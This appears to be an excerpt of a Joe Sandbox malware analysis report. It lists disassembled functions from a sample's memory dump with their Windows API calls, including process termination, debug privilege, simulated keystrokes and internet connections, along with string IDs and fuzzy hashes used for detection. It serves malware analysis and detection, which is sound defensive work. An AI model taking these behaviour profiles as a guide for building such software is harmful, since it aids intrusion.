                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 858772685-4153970271
                                                                                • Opcode ID: 106a55485deecf41b0fc9dd0e6a4cd7bf57521cf9bc1cf6ec29091dbb170f09a
                                                                                • Instruction ID: 608ba5ac0e666e773fe58f734e494c7cb84010d1214de0c129a3d63e26990899
                                                                                • Opcode Fuzzy Hash: 106a55485deecf41b0fc9dd0e6a4cd7bf57521cf9bc1cf6ec29091dbb170f09a
                                                                                • Instruction Fuzzy Hash: B721943190021EABDF25AF94CC0AEEE7B7AFF18700F04442BF515661A1DB719A28DF61
                                                                                Function 0063209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32 ref: 006320AB
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 006320C0
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0063214D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1290815626-3381328864
                                                                                • Opcode ID: af016500c36db37f76333a16bf42a5a47c1a9240dd3c61cdd677b3e35676d275
                                                                                • Instruction ID: 5c965206ccaa653841374b03f4ae521a611c325fd9ed8310fc175e229daac4dd
                                                                                • Opcode Fuzzy Hash: af016500c36db37f76333a16bf42a5a47c1a9240dd3c61cdd677b3e35676d275
                                                                                • Instruction Fuzzy Hash: DE115C7728870BBAFA012220DC2BCF7379FDB05324F200116F705E41D5FEB568425A58
                                                                                Function 0060CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                • String ID:
                                                                                • API String ID: 1282221369-0
                                                                                • Opcode ID: f0e35a9732e993ef6100ac90dd81899d03a24fe7cf3aa6708b2ab7e9787b6e20
                                                                                • Instruction ID: e9ee42dc088ee0b199f43fd43d0941ff37eee69336ff849840c7916f3c45fbf9
                                                                                • Opcode Fuzzy Hash: f0e35a9732e993ef6100ac90dd81899d03a24fe7cf3aa6708b2ab7e9787b6e20
                                                                                • Instruction Fuzzy Hash: 426178B2984302AFDB2DBFB49895AAF7BA7AF01330F14426DF905A73C1D6319D018751
                                                                                Function 006650D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00665186
                                                                                • ShowWindow.USER32(?,00000000), ref: 006651C7
                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 006651CD
                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006651D1
                                                                                  • Part of subcall function 00666FBA: DeleteObject.GDI32(00000000), ref: 00666FE6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0066520D
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0066521A
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0066524D
                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00665287
                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00665296
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                • String ID:
                                                                                • API String ID: 3210457359-0
                                                                                • Opcode ID: b7184de68763ee9f71cc4f73340afeeaa74d2f48b6fa0fdecac350874824bfb7
                                                                                • Instruction ID: 0f6292cd71d43d5d57f5cbdf776271935f4cce90c830645b9c95a2fb3a169222
                                                                                • Opcode Fuzzy Hash: b7184de68763ee9f71cc4f73340afeeaa74d2f48b6fa0fdecac350874824bfb7
                                                                                • Instruction Fuzzy Hash: F451D370A50A09BFEF209F25CC5BBD97B6BFB06320F144012F616963E0C3B5AA90DB51
                                                                                Function 005E8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00626890
                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006268A9
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006268B9
                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006268D1
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006268F2
                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00626901
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0062691E
                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0062692D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: e76c088c221df7f154a164e809b622347962c04480cdfb56cce4300c6e9b0804
                                                                                • Instruction ID: b1534bdf575b333ed3ef6dbe8d43f5104f3f3c5d2dbef71a4c8b95d11cbf1c0c
                                                                                • Opcode Fuzzy Hash: e76c088c221df7f154a164e809b622347962c04480cdfb56cce4300c6e9b0804
                                                                                • Instruction Fuzzy Hash: 89519B70A00A09EFDB24DF25DC55BBA7BBAFB44360F104518F996972A0DBB0E990DF50
                                                                                Function 0064C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0064C182
                                                                                • GetLastError.KERNEL32 ref: 0064C195
                                                                                • SetEvent.KERNEL32(?), ref: 0064C1A9
                                                                                  • Part of subcall function 0064C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0064C272
                                                                                  • Part of subcall function 0064C253: GetLastError.KERNEL32 ref: 0064C322
                                                                                  • Part of subcall function 0064C253: SetEvent.KERNEL32(?), ref: 0064C336
                                                                                  • Part of subcall function 0064C253: InternetCloseHandle.WININET(00000000), ref: 0064C341
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 337547030-0
                                                                                • Opcode ID: 97a99c1f1e2b933b6b4453723b468182dc5b91018e331e3253eb33441718b073
                                                                                • Instruction ID: 815e09d4c6fb642dc824b29216ce790dafca816c4c382452e62a6c3efc6473bc
                                                                                • Opcode Fuzzy Hash: 97a99c1f1e2b933b6b4453723b468182dc5b91018e331e3253eb33441718b073
                                                                                • Instruction Fuzzy Hash: 4C31AF71202A41AFDB619FB5DC04AB7BBFAFF18320B00442DF99683720D7B1E9149B60
                                                                                Function 006325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00633A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00633A57
                                                                                  • Part of subcall function 00633A3D: GetCurrentThreadId.KERNEL32 ref: 00633A5E
                                                                                  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006325BD
                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006325DB
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006325DF
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006325E9
                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00632601
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00632605
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0063260F
                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00632623
                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00632627
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 2014098862-0
                                                                                • Opcode ID: c3e99a4757f0309f3e4b076d5f1779d2f041d1d984f573f563204ba82770d9bd
                                                                                • Instruction ID: 0904cc804aeaf34d170005ce9980b9601eca4e19e89337dbd1d469902f9139fd
                                                                                • Opcode Fuzzy Hash: c3e99a4757f0309f3e4b076d5f1779d2f041d1d984f573f563204ba82770d9bd
                                                                                • Instruction Fuzzy Hash: F801D430390620BBFB107768DC8AF697F5ADF4EB22F101005F358AE1E1C9E224449AAD
                                                                                Function 00631803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00631449,?,?,00000000), ref: 0063180C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00631449,?,?,00000000), ref: 00631813
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00631449,?,?,00000000), ref: 00631828
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00631449,?,?,00000000), ref: 00631830
                                                                                • DuplicateHandle.KERNEL32(00000000,?,00631449,?,?,00000000), ref: 00631833
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00631449,?,?,00000000), ref: 00631843
                                                                                • GetCurrentProcess.KERNEL32(00631449,00000000,?,00631449,?,?,00000000), ref: 0063184B
                                                                                • DuplicateHandle.KERNEL32(00000000,?,00631449,?,?,00000000), ref: 0063184E
                                                                                • CreateThread.KERNEL32(00000000,00000000,00631874,00000000,00000000,00000000), ref: 00631868
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: 72f453b8f28487469c631f718bad289312bc33fc8cbe9bccfed639d0a269c31f
                                                                                • Instruction ID: 3f5251d1d2d6fa9ec6c5f79e71afa8073d3befdad6d0ff869fda58354c4dce0e
                                                                                • Opcode Fuzzy Hash: 72f453b8f28487469c631f718bad289312bc33fc8cbe9bccfed639d0a269c31f
                                                                                • Instruction Fuzzy Hash: 2C01BF75240744BFE710AB66DC4DF677B6DEB8AB11F015411FA45DB191C6B19800CB70
                                                                                Function 0065A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0063D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0063D501
                                                                                  • Part of subcall function 0063D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0063D50F
                                                                                  • Part of subcall function 0063D4DC: CloseHandle.KERNEL32(00000000), ref: 0063D5DC
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065A16D
                                                                                • GetLastError.KERNEL32 ref: 0065A180
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065A1B3
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0065A268
                                                                                • GetLastError.KERNEL32(00000000), ref: 0065A273
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065A2C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 9aaaeb92580bc8c1f8feda807ca6ad5acd0d070e976b5c9d6fc5ca47e89e3f2e
                                                                                • Instruction ID: bf6c5d43c8ee21a2373118a232c190e429e819f6775f3a2a152dc8d32a002c77
                                                                                • Opcode Fuzzy Hash: 9aaaeb92580bc8c1f8feda807ca6ad5acd0d070e976b5c9d6fc5ca47e89e3f2e
                                                                                • Instruction Fuzzy Hash: 8661D2302046429FD720DF58C495F65BBE2AF44318F18858DE8568F7A3C772ED4ACB92
                                                                                Function 00663886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00663925
                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0066393A
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00663954
                                                                                • _wcslen.LIBCMT ref: 00663999
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 006639C6
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006639F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcslen
                                                                                • String ID: SysListView32
                                                                                • API String ID: 2147712094-78025650
                                                                                • Opcode ID: c46bf5a31997b954892b54f284157415ced305eb64a3966ad0169ec524b0ac6d
                                                                                • Instruction ID: 1b063f4dd4a6850800b7b32d94a1f9a5663eb7df50319cae4b11b00a2d380972
                                                                                • Opcode Fuzzy Hash: c46bf5a31997b954892b54f284157415ced305eb64a3966ad0169ec524b0ac6d
                                                                                • Instruction Fuzzy Hash: 7A419671A00219ABDF219F64CC49FEA7BAAFF48350F10052AF558E7381D7B59D80CB94
                                                                                Function 0063BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0063BCFD
                                                                                • IsMenu.USER32(00000000), ref: 0063BD1D
                                                                                • CreatePopupMenu.USER32 ref: 0063BD53
                                                                                • GetMenuItemCount.USER32(01A3EF78), ref: 0063BDA4
                                                                                • InsertMenuItemW.USER32(01A3EF78,?,00000001,00000030), ref: 0063BDCC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 0$2
                                                                                • API String ID: 93392585-3793063076
                                                                                • Opcode ID: c6744da1632def50c51612f8b47dbc7924480e5607b454becbe692e951432f0d
                                                                                • Instruction ID: 6f515f744df3bbc0cc85951e5b893ac5acd14c2f592daf820fd542454f8a80fe
                                                                                • Opcode Fuzzy Hash: c6744da1632def50c51612f8b47dbc7924480e5607b454becbe692e951432f0d
                                                                                • Instruction Fuzzy Hash: D751AF70A002099BDF20DFA8D884BEEBBF6BF45324F146159E651E7391D7709941CBA1
                                                                                Function 005F2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 005F2D4B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 005F2D53
                                                                                • _ValidateLocalCookies.LIBCMT ref: 005F2DE1
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 005F2E0C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 005F2E61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: &H_$csm
                                                                                • API String ID: 1170836740-4263142645
                                                                                • Opcode ID: ed42c63b08778af9c82b708a3ed9116dce9c86e1e3c3dbe731a40205c93cc977
                                                                                • Instruction ID: 9141ff5196133bf16a7e57f45c92cb4b7ba2c9bd8752fba5ac7c59d45926c66d
                                                                                • Opcode Fuzzy Hash: ed42c63b08778af9c82b708a3ed9116dce9c86e1e3c3dbe731a40205c93cc977
                                                                                • Instruction Fuzzy Hash: C841B374A0020DABCF14DF68C845ABEBFB5BF85324F148155EA14AB392D7399E02CB90
                                                                                Function 0063C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 0063C913
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: 97cbc55fb2942a61284626a910b9c6d0ff512f61a8260dd2e12aaf215db81bce
                                                                                • Instruction ID: 0c6326e87ceac194363477dad31ebc8a6e6e1ac16b56b4573245564e4c2de26c
                                                                                • Opcode Fuzzy Hash: 97cbc55fb2942a61284626a910b9c6d0ff512f61a8260dd2e12aaf215db81bce
                                                                                • Instruction Fuzzy Hash: E6112B3268930BBAEB009B54DC82DEB7B9EDF15334F11006AF504BA2C2D7B46F4057A4
                                                                                Function 0063ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 952045576-0
                                                                                • Opcode ID: 624077caa4f46c24b695e828190bd3dd4f9832442a63aaf8a835c026755f1eba
                                                                                • Instruction ID: db8877e9271e4a09b3418a43392877701a6f4074f6bc6d7bff16a1668814fcc9
                                                                                • Opcode Fuzzy Hash: 624077caa4f46c24b695e828190bd3dd4f9832442a63aaf8a835c026755f1eba
                                                                                • Instruction Fuzzy Hash: 4C41D069C0021D75CB10EBB4888E9DFBBB9BF85700F008466E618E3161FB38E241C3E5
                                                                                Function 005EF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 005EF953
                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0062F3D1
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0062F454
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
